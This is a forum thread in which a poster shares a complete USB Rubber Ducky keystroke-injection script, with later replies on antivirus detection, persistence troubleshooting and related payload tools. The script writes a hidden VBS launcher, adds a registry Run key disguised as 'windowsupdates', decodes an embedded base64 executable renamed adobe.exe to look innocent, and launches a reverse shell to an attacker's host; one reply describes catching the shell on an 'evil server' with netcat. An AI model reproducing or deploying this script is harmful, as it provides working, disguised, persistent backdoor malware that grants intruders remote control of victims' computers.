russianmonk Posted October 18, 2011 Share Posted October 18, 2011 (edited) Well I wanted to make the original Reverse Shell script a little more useful for "remote administration". I wrote a batch file of this a while ago so I figured I would use it on the ducky....worked perfect. Basically it makes it so the file is in \windows\system32 and makes it run at startup. It first creates runwinupdate.vbs (this allows the command to start the remote program at boot in a hidden cmd window). Next it creates a reg key that runs the vbs script on boot. Then it deleted the reg file after adding it to the registry. Next it creates the winupdate.bat which has the command to run the remote program at start. (I also renamed the remote.exe to adobe.exe...little more sneaky). At the bottom of the code I put a little "cleanup" bat file code. Makes it easier if you are testing it instead of having to delete everything one by one. Any questions or suggestion let me know!***If this description doesn't make sense sorry....im tired*** ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 MENU DELAY 400 STRING a DELAY 600 LEFTARROW ENTER DELAY 400 STRING copy con c:\windows\system32\runwinupdate.vbs ENTER STRING Set WshShell = CreateObject("WScript.Shell") ENTER STRING WshShell.Run chr(34) & "winupdate.bat" & Chr(34), 0 ENTER STRING Set WshShell = Nothing ENTER CTRL Z ENTER STRING copy con c:\windows\system32\dirty.reg ENTER STRING REGEDIT4 ENTER STRING [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] ENTER STRING "windowsupdates"="C:\\windows\\system32\\runwinupdate.vbs" ENTER CTRL Z ENTER STRING REGEDIT /s dirty.reg ENTER STRING del dirty.reg ENTER STRING copy con c:\windows\system32\winupdate.bat ENTER STRING @echo off ENTER STRING cd /D c:\windows\system32 ENTER STRING adobe.exe "INSERT YOUR INFO HERE" 8080 ENTER CTRL Z ENTER STRING copy con c:\windows\system32\decoder.vbs ENTER STRING Option Explicit:Dim arguments, inFile, outFile:Set arguments = WScript.Arguments:inFile = arguments(0) STRING :outFile = arguments(1):Dim base64Encoded, base64Decoded, outByteArray:dim objFS:dim objTS:set objFS = STRING CreateObject("Scripting.FileSystemObject"): ENTER STRING set objTS = objFS.OpenTextFile(inFile, 1):base64Encoded = STRING objTS.ReadAll:base64Decoded = decodeBase64(base64Encoded):writeBytes outFile, base64Decoded:private function STRING decodeBase64(base64): ENTER STRING dim DM, EL:Set DM = CreateObject("Microsoft.XMLDOM"):Set EL = DM.createElement("tmp"): STRING EL.DataType = "bin.base64":EL.Text = base64:decodeBase64 = EL.NodeTypedValue:end function:private Sub STRING writeBytes(file, bytes):Dim binaryStream: ENTER STRING Set binaryStream = CreateObject("ADODB.Stream"):binaryStream.Type = 1: STRING binaryStream.Open:binaryStream.Write bytes:binaryStream.SaveToFile file, 2:End Sub ENTER CTRL z ENTER STRING copy con c:\windows\system32\adobeupdate.txt ENTER STRING TVprZXJuZWwzMi5kbGwAAFBFAABMAQIAAAAAAAAAAAAAAAAA4AAPAQsBAAAAAgAAAAAAAAAA ENTER STRING AADfQgAAEAAAAAAQAAAAAEAAABAAAAACAAAEAAAAAAAAAAQAAAAAAAAAAFAAAAACAAAAAAAA ENTER STRING AgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAA20IAABQAAAAAAAAAAAAAAAAA ENTER STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ENTER STRING AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATUVXAEYS ENTER STRING 0sMAMAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAwALSdduKFuvUABAAAABAAADvAgAA ENTER STRING AAIAAAAAAAAAAAAAAAAAAOAAAMC+HEBAAIvera1QrZeygKS2gP8Tc/kzyf8TcxYzwP8TcyG2 ENTER STRING gEGwEP8TEsBz+nU+quvg6HI+AAAC9oPZAXUO/1P86yas0eh0LxPJ6xqRSMHgCKz/U/w9AH0A ENTER STRING AHMKgPwFcwaD+H93AkFBlYvFtgBWi/cr8POkXuubrYXAdZCtlq2XVqw8AHX7/1PwlVatD8hA ENTER STRING WXTseQesPAB1+5FAUFX/U/SrdefDAAAAAAAzyUH/ExPJ/xNy+MOwQgAAvUIAAAAAAAAAQEAA ENTER STRING MAFAAAAQQAAAEEAAaBwGMkAHagHoDnw4VQzoQgLIFTiean446lMMelAsFnRBMP0Bv1WysTNq ENTER STRING kQIGsnxVmiejeINmxwVke0+mOGe8XVBmlD05ZqNofmRmfiF9i3MM2QpqaJQtoTp6b0gV6kwF ENTER STRING EVBkkBBNRFWRFDxAeGooEGhdKP81MHTopJ5RVFWhVY2/bg4KCJAiC+FRFOgfgUvD/yUkILtv ENTER STRING KhwGQxghFL3DIghxzAFVi+yBxHz+/4hWV+hgrN2JRfwzHcmLdX44PB10Bx4iQPdB6/RR0XLp ENTER STRING AOFYO8F0C19eMLgDucnCCOGGSY29PHDlQyoJzy/gArAgqutz8iiNhRU5i/A2+DMqM+sbiwNm ENTER STRING MgfvImUgTf4iEeEoLe2UCIO53LcwS3T7OzpNCKgVWWUdZwpME0EdDxTr5qoNNgcZhzj0sH/A ENTER STRING VXMRi30Mxhe4An+CohOdaLCgWDQzDUYN5tH34f5Yo+7nRLsfFqnOEQTeVQE81BTUDhszwE7s ENTER STRING hwtw0ooGRj08ArMSDvffkOsLLDAZjQyJBkiDLQrAdfHoBBEzUcI44jCDxAf0avXoaQkZSf+9 ENTER STRING gqogC9Aqk3U3+FAinSmGBvzoTS9oiyQ45lMaDwiNUAMhGIPABOP5//6AAvfTI8uB4USAdHzp ENTER STRING bMEMYHV3BvQQwEAC0OEbwlFbOkfESRnKDFcGCDAAADBAAGMwbWQAZj9AABQ4IEADd3MyXzOY ENTER STRING LmRs48CAZwdldGhvc0BieW5he23PHmOePPfr/w4SV1NBXc9hckZ1cBh5aMoscxNPJmNrYu/B ENTER STRING /7gDbJUacspebEzHV9NpdPNGp7yRR8NMQ29tiGFuZDZMaURifoB2cvudOlC3gudzFUFYIcBk ENTER STRING SNBDL2AAAAAAAGY/QABMb2FkTGlicmFyeUEAR2V0UHJvY0FkZHJlc3MAAAAAAAAAAAAAAAAA ENTER STRING AAxAAADpdL7//wAAAAIAAAAMQAAA ENTER CTRL z ENTER STRING cscript c:\windows\system32\decoder.vbs c:\windows\system32\adobeupdate.txt c:\windows\system32\adobe.exe ENTER STRING del c:\windows\system32\decoder.vbs ENTER STRING del c:\windows\system32\adobeupdate.txt ENTER STRING c:\windows\system32\adobe.exe "INSERT YOUR INFO HERE" 8080 ENTER STRING exit ENTER CleanupRun this in a bat file if you wanna clean up the files @echo off del c:\windows\system32\adobe.exe del c:\windows\system32\winupdate.bat del c:\windows\system32\runwinupdate.bat del c:\windows\system32\runwinupdate.vbs reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v windowsupdates pause Edited February 6, 2013 by midnitesnake correct formatting Quote Link to comment Share on other sites More sharing options...
bobbyb1980 Posted October 18, 2011 Share Posted October 18, 2011 Sounds like a usb version of persistence, but what about anti-virus? Quote Link to comment Share on other sites More sharing options...
russianmonk Posted October 18, 2011 Author Share Posted October 18, 2011 Malwarebytes and MS Security Essentials couldn't find anything on my computer. Quote Link to comment Share on other sites More sharing options...
telot Posted February 26, 2012 Share Posted February 26, 2012 The scripts goal is quite admirable and awesome, and I'm very interested in getting it to work. Unfortunately I'm having trouble getting persistence out of this script. It works great during the session after I plug in the ducky - I get the reverse shell onto my evil server but have after reboot it never returns back up (yes, I'm killing netcat and bringing it backup between reboots). I check HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run on my target machine and theres no entry for winupdate.bat. Instead theres just an entry for Microsoft Security Essentials and the obligatory Default. Any thoughts on why this would be? My only experience doing registry hacks was back in win98 making the Start button say "FU" instead of Start lol... Any help would be greatly appreciated as always telot Quote Link to comment Share on other sites More sharing options...
TeCHemically Posted July 27, 2012 Share Posted July 27, 2012 All of these reverse shell scripts I try fail to create the "reverse.exe" file from the txt file via the cscript command. These are Win7 test machines. Any thoughts as to why? Quote Link to comment Share on other sites More sharing options...
russianmonk Posted August 15, 2012 Author Share Posted August 15, 2012 Hey guy, Sorry for the slooooowwwww reply. I'll take a look at this soon and do some more testing. Been pretty busy lately. It's such a fun script though :) Quote Link to comment Share on other sites More sharing options...
ms24 Posted September 13, 2012 Share Posted September 13, 2012 Sorry for stupid and may be offtopic question. But is it possible with that reverse shell to send/receive some files to/from Windows PC ? Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted September 13, 2012 Share Posted September 13, 2012 Just FYI. The Social Engineering Toolkit has payloads for teensy/ducky in a menu driven interface. Quote Link to comment Share on other sites More sharing options...
Batman Posted September 14, 2012 Share Posted September 14, 2012 Just FYI. The Social Engineering Toolkit has payloads for teensy/ducky in a menu driven interface. Do you know if these payloads are kept up to date? Thanks Quote Link to comment Share on other sites More sharing options...
Mr-Protocol Posted September 14, 2012 Share Posted September 14, 2012 Do you know if these payloads are kept up to date? Thanks Not sure. I would think they would be kept updated with SET toolkit defaults. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.